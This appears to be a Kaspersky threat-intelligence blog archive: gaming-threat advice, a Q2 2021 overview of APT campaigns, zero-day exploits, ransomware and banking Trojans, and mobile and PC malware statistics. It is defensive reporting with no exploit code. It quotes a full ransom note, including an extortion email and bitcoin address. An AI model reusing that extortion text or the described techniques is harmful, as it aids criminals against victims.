Cybercriminals can also promote fake giveaways on the platforms themselves. Earlier, we covered one such scheme on Twitch, where scammers created fake streamer profiles to attract user attention.

Fake it till you make it

Online tournaments are also increasingly popular, and cybercrooks have learnt that, too. We have come across phishing pages that replicate popular tournaments and even mention sponsor brands to make it more convincing. These schemes generally result in logins and passwords being stolen as well.

This finely designed tournament page is nothing more than a scam that capitalizes on well-known and trusted brands

Conclusion and advice

The effects of the pandemic on the video game industry were quite evident and led to a rise in attacks on users playing PC and mobile games. At the same time, as things are moving back to normal, we observe two very different trends: while PC gamers are becoming less likely to be attacked, mobile gamers remain a very attractive target for cybercriminals, a trend that will probably follow the rapid growth of the mobile industry as a whole.

While most of the threats distributed to gamers are adware, the smaller share of malware containing particularly dangerous strains requires attention. We have witnessed malware hiding under the guise of games – and distributed in very active coordinated campaigns that involve phishing and warez websites. Furthermore, cybercrooks continue to invest into promotion of malware landing pages and can even make it to the top of popular search engines.

The number of schemes targeting gamers is also growing, and telling a scheme apart from the real deal visually is still hard for regular users. Jumping on the bandwagon of the online platform rush and gaming tournaments, cybercriminals manage to take suspicions off themselves and trick users into giving up their data. Overall, the hunt for gaming credentials and in-game goodies continues. It also may take other forms, which we will discuss in the second part of the report. In a situation like this, the best way for users to protect themselves is to stay vigilant and employ reliable technology that can help detect a threat when human judgement fails.

To stay safe while gaming, we recommend:

  • Wherever possible, protect your accounts with two-factor authentication. For other cases, comb through account settings.
  • Use strong passwords – and a unique one for every account. That way, even if one of your accounts gets stolen, the rest will not go with it.
  • A strong, reliable security solution will be a great help to you, especially if it will not slow down your computer while you are playing, but at the same time, it will protect you from all possible cyberthreats. For example Kaspersky Total Security works smoothly with Steam and other gaming services.
  • It is safer to download your games only from official stores like Steam, Apple App Store, Google Play or Amazon Appstore. Games from these markets are not 100 % secure, but they at least are checked by store representatives and there is some kind of screening system: not every app can get into these stores.
  • If you wish to buy a game that is not available through major stores, purchase them from the official website only. Double-check the URL of the website and make sure it is authentic.
  • Try to avoid buying the first thing that pops up. Even during Steam’s summer sale, before forking out the dough for a little-known title, at least read some reviews. If something is fishy, other people will probably figure it out.
  • Beware of phishing campaigns and unfamiliar gamers. Do not open links received by email or in a game chat unless you trust the sender. Do not open files you get from strangers.
  • Carefully check the address of any resource that requests you to enter your username and password: the page might be fake.
  • Do not download pirated software or any other illegal content, even if you are redirected to it from a legitimate website.
  • Update your operating system and important apps as updates become available. Many safety issues can be solved by installing updated versions of software.
  • Do not open questionable websites when these are offered in search results and do not install anything that comes from those.
  • Use a robust security solution to protect yourself from malicious software and its activity on mobile devices, such as Kaspersky Internet Security for Android.
2021. augusztus 12.

IT threat evolution Q2 2021

Targeted attacks The leap of a Cycldek-related threat actor

It is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous “DLL side-loading triad”: a legitimate executable, a malicious DLL to be side-loaded by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of LuckyMouse, but we have observed other groups using similar “triads”, including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.

We recently described one such file, called “FoundCore”, which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:

However, in this case, the shellcode was heavily obfuscated – the technical details were presented in the ‘The leap of a Cycldek-related threat actor‘ report. We found the loader for this file so interesting that we decided to base one of the tracks of our Targeted Malware Reverse Engineering course on it.

The final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.

In the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com – all generated using RoyalRoad and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents – possibly delivered by means of spear-phishing or a previous infection – that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware – named DropPhone and CoreLoader.

Our telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.

While Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign – which is why we attribute the campaign, with low confidence, to this threat actor.

Zero-day vulnerability in Desktop Window Manager used in the wild

While analyzing the CVE-2021-1732 exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, Microsoft released a patch for the new zero-day (CVE-2021-28310) as part of its April security updates.

CVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. DirectComposition is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).

The exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.

We believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.

You can find technical details on the exploit in the ‘Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild‘ post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact intelreports@kaspersky.com.

Operation TunnelSnake

Windows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.

Nevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.

One such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed “Moriya”, was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.

This tool was used as part of an ongoing campaign that we named “TunnelSnake“. The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.

Since neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker’s infrastructure. However, the bulk of the detected tools besides Moriya, consist of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker’s origin.


On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.

While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 – RS5, 18362 – 19H1, 18363 – 19H2, 19041 – 20H1, 19042 – 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.

On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.

The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a “remote shell”-style backdoor, which in turns connects to the C2 to get commands.

We weren’t able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity PuzzleMaker.

Andariel adds ransomware to its toolset

In April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.

During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.

Historically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.

We also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.

Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlying the financial motivation of this threat actor.

Ferocious Kitten

Ferocious Kitten is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to researchers on Twitter. Since then, one of its implants has been analyzed by a Chinese threat intelligence firm.

We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed “MarkiRAT”, records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim’s computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.

Ferocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren’t reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.

Other malware Evolution of JSWorm ransomware

While ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as WannaCry and NotPetya. Many ransomware gangs have switched to the more profitable tactic of “big-game hunting”; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there’s now a well-developed eco-system underpinning ransomware attacks.

As a result, even though the number of ransomware attacks has fallen, and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.

We recently published analysis of one such ransomware family, named JSWorm. This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.

Each “re-branded” version has included alterations to different aspects of the code – file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.

Black Kingdom ransomware

Black Kingdom first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka ProxyLogon). This ransomware family is much less sophisticated than other Ransomware-as-a-Service (RaaS) or big game hunting families. The group’s involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.

The malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a script to recover files encrypted with the embedded key.

Black Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.

*************************** | We Are Back ? *************************** We hacked your (( Network )), and now all files, documents, images, databases and other important data are safely encrypted using the strongest algorithms ever. You cannot access any of your files or services . But do not worry. You can restore everthing and get back business very soon ( depends on your actions ) before I tell how you can restore your data, you have to know certain things : We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public. To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware ) *************************** | What guarantees ? *************************** We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free just send the files you want to decrypt to (support_blackkingdom2@protonmail.com *************************************************** | How to contact us and recover all of your files ? *************************************************** The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses . [ + ] Instructions: 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address : [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ] 3- confirm your payment by sending the transfer url to our email address 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you, so that you can recover all your files. ## Note ## Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible. By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites. Your ID ==> FDHJ91CUSzXTquLpqAnP

After decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder available on GitHub. The group adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key. We were not able to attribute Black Kingdom to any known threat group.

Based on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.

Gootkit: the cautious banking Trojan

Gootkit belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it’s not very common, new versions of the Trojan may remain under the researchers’ radar for long periods.

It is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.

Gootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan’s loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.

In 2019, Gootkit stopped operating after it experienced a data leak, but has been active again since November 2020. Most of the victims are located in EU countries such as Germany and Italy.

Bizarro banking Trojan expands into Europe

Bizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.

As with Tetrade, Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.

Bizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.

Bizarro is one of several banking Trojans from South America that have extended their operations into other regions – mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.

Malicious code in APKPure app

In early April, we discovered malicious code in version 3.17.18 of the official client of the APKPure app store, a popular alternative source of Android apps. The incident seems to be similar to what happened with CamScanner, when the app’s developer implemented an adware SDK from an unverified source.

When launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the Triada Trojan. If the device is older (Android 6 or 7, and without security updates installed) it could be the xHelper Trojan.

We reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.

Browser lockers

Browser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The “locking” consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.

This type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. The tricks used by the scammers include imitating the infamous “Blue Screen of Death” (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.

In our report on browser lockers, we examined two families of lockers that mimic government websites.

Both families spread mainly via advertising networks, primarily aimed at selling “adult” content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).

These threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don’t fall for the cybercriminals’ smoke-and-mirror tactics.

Malware targets Apple M1 chip

Last November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. Unfortunately, just months after the release, malware writers had already adapted several malware families to the new processor.

Attempted supply-chain attack using PHP

In March, unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language. The developers of PHP make changes to the code using a common repository built on the GIT version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, in around 80 per cent of which (web servers) PHP is used.

2021. augusztus 12.

IT threat evolution in Q2 2021. Mobile statistics

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

In Q2 2021, according to data from Kaspersky Security Network:

  • 14,465,672 malware, adware and riskware attacks were prevented.
  • The largest share of all detected threats accrued to RiskTool programs — 38.48%.
  • 886,105 malicious installation packages were detected, of which:
  • 24,604 packages were mobile banking Trojans;
  • 3,623 packages were mobile ransomware Trojans.
Quarterly highlights

Android’s own security has changed dramatically since the first devices were released with Android 1.6 Donut when it became the most dominant OS on the market. The development of Google Play Protect is worth highlighting, and the rights of apps have since been severely restricted, as now they have to request all permissions from users explicitly. Moreover, the security subsystem was moved to a separate updatable component, independent of the device manufacturer. Yet there is one thing both the old 1.6 version and the latest Android 11 have in common which significantly compromises the operating system’s security: the freedom to install apps from third-party sources. It’s great in terms of OS user-friendliness — I use it myself almost every day — but it gives all sorts of cybercriminals a real “window of opportunity” from a security point of view. It’s also the reason why third-party distribution platforms for Android apps have mushroomed. These platforms offer the most diverse range of downloads, from popular apps clones to different types of malware. However, the platform is not the only danger. The client working with it can also be to blame for loading and installing apps into the system similar to the official Google Play client.

In Q2 2021, we discovered that the popular APKPure app has been infected by a malicious module. The developers implemented an unverified advertisement SDK, which downloaded Trojans to users’ devices without them knowing. In other words, a Trojan dropper found a way into the program together with the SDK. The malware’s next move depended on the Android OS version it managed to infect. Users with relatively recent versions would get off more lightly with just some annoying advertising and subscriptions, but devices running older versions were in for a plethora of threats such as the xHelper mobile Trojan.

This review will conclude with a chart depicting mobile threats detected on devices with installed Kaspersky security solutions.

Number of attacks targeting users of Kaspersky mobile solutions, Q2 2020 — Q2 2021 (download)

Mobile threats clearly are not letting up, and the number of attacks remains persistently high. The number of malware, adware and riskware attacks exceeded the 14.4 million mark in the second quarter.

Mobile threat statistics

Kaspersky Lab detected 886,105 malicious installation packages in Q2 2021, which is 565,555 less than in the previous quarter and 359,789 less than the number detected in Q2 2020.

Number of detected malicious installation packages, Q2 2020 — Q2 2021 (download)

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type, Q1 and Q2 2021 (download)

A third of all the threats detected in Q2 2021 accrued to RiskTool (38.48%). The percentage of these riskware attacks dramatically increased by 23.04 p.p. in light of the decline in adware attacks. The vast majority of detected apps of this type (93,52%) belong to the SMSreg family.

Adware came in second (34.10%) with 27.33 p.p. down compared to the previous quarter. The worst offenders were adware from the Ewind family (52.38% of all adware threats detected), HiddenAd (18.11%) and FakeAdBlocker (13.56%).

Various types of Trojans complete the top three (16.48%), whose share increased by 8.21 p.p. The Trojans which stood out came from the Mobtes (84.89%), Boogr (7.71%) and Plangton (1.53%) families.

Top 20 mobile malware programs

Note that the malware rankings below exclude PUAs, such as riskware or adware.

Verdict %* 1 DangerousObject.Multi.Generic 39.94 2 Trojan-Spy.AndroidOS.SmsThief.po 10.03 3 Trojan-SMS.AndroidOS.Agent.ado 5.68 4 DangerousObject.AndroidOS.GenericML 4.29 5 Trojan.AndroidOS.Agent.vz 3.85 6 Trojan-Dropper.AndroidOS.Agent.rp 3.56 7 Trojan.AndroidOS.Triada.el 3.33 8 Trojan-Downloader.AndroidOS.Necro.d 3.21 9 Trojan.AndroidOS.Triada.ef 3.09 10 Trojan.AndroidOS.MobOk.ad 3.01 11 Trojan-Dropper.AndroidOS.Hqwar.bk 2.81 12 Trojan.AndroidOS.Hiddad.gx 2.77 13 Trojan.AndroidOS.Whatreg.b 2.51 14 Trojan-Dropper.AndroidOS.Triada.ap 2.51 15 Trojan-Downloader.AndroidOS.Gapac.d 2.37 16 Trojan-Dropper.AndroidOS.Hqwar.cf 1.90 17 Trojan-Downloader.AndroidOS.Agent.kx 1.90 18 Trojan.AndroidOS.Triada.dq 1.89 19 Trojan-Banker.AndroidOS.Svpeng.t 1.88 20 HackTool.AndroidOS.Wifikill.c 1.86

* Unique users attacked by this malware as a percentage of all attacked users of Kaspersky mobile solutions.

The DangerousObject.Multi.Generic verdict (39,94%), which we apply to all malware detected with cloud technology, is topping the list, as usual. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is essentially how the latest malware types are detected.

The second place went to a Trojan called Trojan-Spy.AndroidOS.SmsThief.po (10.03%), the main task of which is monitoring incoming text messages and forwarding intercepted data to the cybercriminals’ server. The malware is essentially a “Russian doll” with the outer layer being a Trojan dropper and the encrypted DEX file of SmsThief.po itself buried deep within the APK distribution. This Trojan mostly targeted users in Russia.

The Top 3 was rounded out by Trojan-SMS.AndroidOS.Agent.ado (5.68%), a form of malware which sends text messages to short premium-rate numbers draining the victim’s mobile account. In order for the attack to succeed, the Trojan waits for a confirmation code (Advice of charge) from the provider and sends a response. Like the previously mentioned form of malware, Agent.ado mostly targets users in Russia.

Fourth place was taken by DangerousObject.AndroidOS.GenericML (4.29%). These verdict is assigned to files recognized as malicious by our machine-learning systems.

Fifth place went to Trojan.AndroidOS.Agent.vz (3.85%), which downloads a payload while serving as a payload for another malicious object. Cybercriminals create these types of chains to ensure malware remains on the device. Even if the victim removes one of the links in the chain, their device is bound to be reinfected by another.

Another “Russian doll” came in sixth — the Trojan-Dropper.AndroidOS.Agent.rp (3.56%). Its outer layer is a Java code, which accesses the native library to decrypt the DEX file located somewhere in the APK file. The inner layer is deployed for the second stage of the attack — the malware we detect as Trojan-Downloader.AndroidOS.Agent.ki. Our remotely collected data indicates that users with Agent.rp also encounter Trojan-Dropper.AndroidOS.Triada.ap (2.51%, 14th place in our rating), Trojan.AndroidOS.Whatreg.b (2.51%, 13th place) and Trojan-Downloader.AndroidOS.Necro.d (3.21%, 8th place). It’s quite likely that all of these Trojans detected in Q2 2021 were part of the same campaign and served as links in the same infection chain. The same applies to the other Trojans from the Trojan.AndroidOS.Triada family ranked seventh, ninth and eighteenth on our list.

Our Top 10 is completed by Trojan.AndroidOS.MobOk.ad (3.01%), the main aim of which is subscribing victims to paid mobile services. MobOk family malware attacked mobile users in Russia more often than in any other country.

Malware from the Trojan-Banker.AndroidOS.Hqwar family came in eleventh and sixteenth place in Q2. The number of known objects from this family just keeps on growing, and had reached 370,744 files by the time this report was compiled.

Twelfth place was taken by Trojan.AndroidOS.Hiddad.gx (2.77%), which aims to display banner ads, ensure a constant presence on the device and hide icons in the app bar.

Fifteenth place went to Trojan-Downloader.AndroidOS.Gapac.d (2.37%) — a Trojan which is also a link in a chain of infection and essentially serves to download other malware.

The Trojan that came in seventeenth in Q2 was Trojan-Downloader.AndroidOS.Agent.kx (1.90%). It is spread through legitimate software and serves the main task of downloading advertising apps.

The well-known banking Trojan Svpeng (1.88%), which we’ve written about on multiple occasions, came in nineteenth place.

Last on our Top 20 is the HackTool.AndroidOS.Wifikill.c, which aims to carry out Denial-of-Service (DoS) attacks on users to disconnect them from a Wi-Fi network. Hackers trick the victim into reconnecting to the same Wi-Fi network in an attempt to capture the handshake and carry out a MitM attack.

Geography of mobile threats

Map of infection attempts by mobile malware, Q2 2021 (download)

Top 10 countries by share of users attacked by mobile malware

Country* %** 1 Iran 23.79 2 Saudi Arabia 23.09 3 China 18.97 4 Algeria 18.47 5 India 16.68 6 Morocco 12.97 7 Malaysia 12.81 8 Nigeria 11.76 9 Ecuador 11.54 10 Bangladesh 11.31

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Share of unique users attacked as a percentage of all users of Kaspersky mobile security solutions in the country.

Iran was the most frequently targeted country in Q2 2021 based on the percentage of infected systems detected (23.79%). The most commonly encountered threat was annoying adware from AdWare.AndroidOS.Notifyer and AdWare.AndroidOS.Fyben families.

Saudi Arabia is in second place (23.09%). Users in this country most frequently encountered adware, but from the AdWare.AndroidOS.HiddenAd and AdWare.AndroidOS.FakeAdBlocker families.

China was the last to make it into the top three (18.97%), where the most common threats came from the riskware families RiskTool.AndroidOS.SmsPay and RiskTool.AndroidOS.Wapron. Both target the victim’s mobile account: the former abuses a shady SMS monetization scheme used in certain games, while the latter sends text messages purportedly as payment for porn viewings. Another Trojan that made the list of top threats in China was Trojan.AndroidOS.Najin.a.

Mobile banking Trojans

In the reporting period, we detected 24,604 installation packages for mobile banking Trojans. That’s 710 up compared to Q1 2021, but 16,801 less than a year before in Q2 2020.

The worst offenders were the creators of the Trojan family known as Trojan-Banker.AndroidOS.Agent, which accounted for 66.23% of all detected banking Trojans. Other threats which stood out were from families called Trojan-Banker.AndroidOS.Gustuff (8.19%) and Trojan-Banker.AndroidOS.Anubis (6.86%). It’s interesting that the latter is one of the most dangerous financial Trojans but one that is very rarely encountered in the wild according to our remotely collected data.

Number of mobile banking Trojan installation packages detected by Kaspersky, Q1 and Q2 2021 (download)

Ten most common mobile bankers

Verdict %* 1 Trojan-Banker.AndroidOS.Svpeng.t 20.90 2 Trojan-Banker.AndroidOS.Agent.eq 19.46 3 Trojan-Banker.AndroidOS.Svpeng.q 8.92 4 Trojan-Banker.AndroidOS.Anubis.t 7.26 5 Trojan-Banker.AndroidOS.Asacub.ce 5.44 6 Trojan-Banker.AndroidOS.Agent.ep 3.08 7 Trojan-Banker.AndroidOS.Hqwar.t 3.03 8 Trojan-Banker.AndroidOS.Agent.cf 2.43 9 Trojan-Banker.AndroidOS.Regon.p 2.40 10 Trojan-Banker.AndroidOS.Asacub.ar 2.33

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

Geography of mobile banking threats, Q2 2021 (download)

Top 10 countries by shares of users attacked by mobile banking Trojans

Country* %** 1 Japan 1.62 2 Spain 0.76 3 France 0.71 4 Turkey 0.64 5 Australia 0.50 6 Norway 0.26 7 South Korea 0.23 8 Italy 0.20 9 Finland 0.16 10 Belgium 0.15

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Japan has the largest share of unique users attacked by mobile financial threats in Q2 2021 (1.62%). The malware detected most often in this country was Trojan-Banker.AndroidOS.Agent.eq, which accounted for 99% of all mobile financial attacks there.

Spain followed by a wide margin with 0.76%. The most commonly encountered malware type there were again Trojan-Banker.AndroidOS.Regon.p (71.38%), Trojan-Banker.AndroidOS.Agent.io (19.15%) and Trojan-Banker.AndroidOS.Cebruser.d (3.75%).

The country that came in third was France (0.71%), where Trojan-Banker.AndroidOS.Agent.eq (98.75%) was also found to be widespread.

Mobile ransomware Trojans

In Q2 2021, we detected 3623 installation packages for mobile ransomware Trojans. That’s 27 more than the number recorded in the last quarter but 182 less than in Q2 2020.

Number of mobile ransomware Trojan installation packages detected by Kaspersky, Q1 and Q2 2021 (download)

Top 10 most common mobile ransomware

Verdict %* 1 Trojan-Ransom.AndroidOS.Pigetrl.a 66.96% 2 Trojan-Ransom.AndroidOS.Rkor.an 4.65% 3 Trojan-Ransom.AndroidOS.Small.as 3.85% 4 Trojan-Ransom.AndroidOS.Fusob.h 2.34% 5 Trojan-Ransom.AndroidOS.Rkor.au 2.29% 6 Trojan-Ransom.AndroidOS.Rkor.as 2.20% 7 Trojan-Ransom.AndroidOS.Rkor.aw 2.11% 8 Trojan-Ransom.AndroidOS.Small.ce 1.17% 9 Trojan-Ransom.AndroidOS.Rkor.at 1.02% 10 Trojan-Ransom.AndroidOS.Soobek.a 1.00%

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

Geography of mobile ransomware Trojans, Q2 2021 (download)

Top 10 countries by share of users attacked by mobile ransomware Trojans

Country* %** 1 Kazakhstan 0.37 2 Sweden 0.12 3 Kyrgyzstan 0.10 4 China 0.09 5 Uzbekistan 0.07 6 Saudi Arabia 0.06 7 Morocco 0.04 8 Pakistan 0.03 9 Lithuania 0.03 10 USA 0.03

* Excluded from the rating are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Unique users attacked by ransomware trojans as a percentage of all Kaspersky mobile security solution users in the country.

The leader by number of users attacked by mobile ransomware Trojans were Kazakhstan (0.37%), Sweden (0.12%) and Kyrgyzstan (0.10%). That said, in Kazakhstan and Sweden users mostly encountered the Trojan-Ransom.AndroidOS.Rkor family Trojans. Apart from Rkor, Trojan-Ransom.AndroidOS.Pigetrl.a was found to be common in Kyrgyzstan.

2021. augusztus 12.

IT threat evolution in Q2 2021. PC statistics

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q2 2021:

  • Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.
  • Web antivirus recognized 675,832,360 unique URLs as malicious.
  • Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.
  • Ransomware attacks were defeated on the computers of 97,451 unique users.
  • Our file antivirus detected 68,294,298 unique malicious and potentially unwanted objects.
Financial threats Financial threat statistics

In Q2 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 119,252 unique users.

Number of unique users attacked by financial malware, Q2 2021 (download)

Geography of financial malware attacks

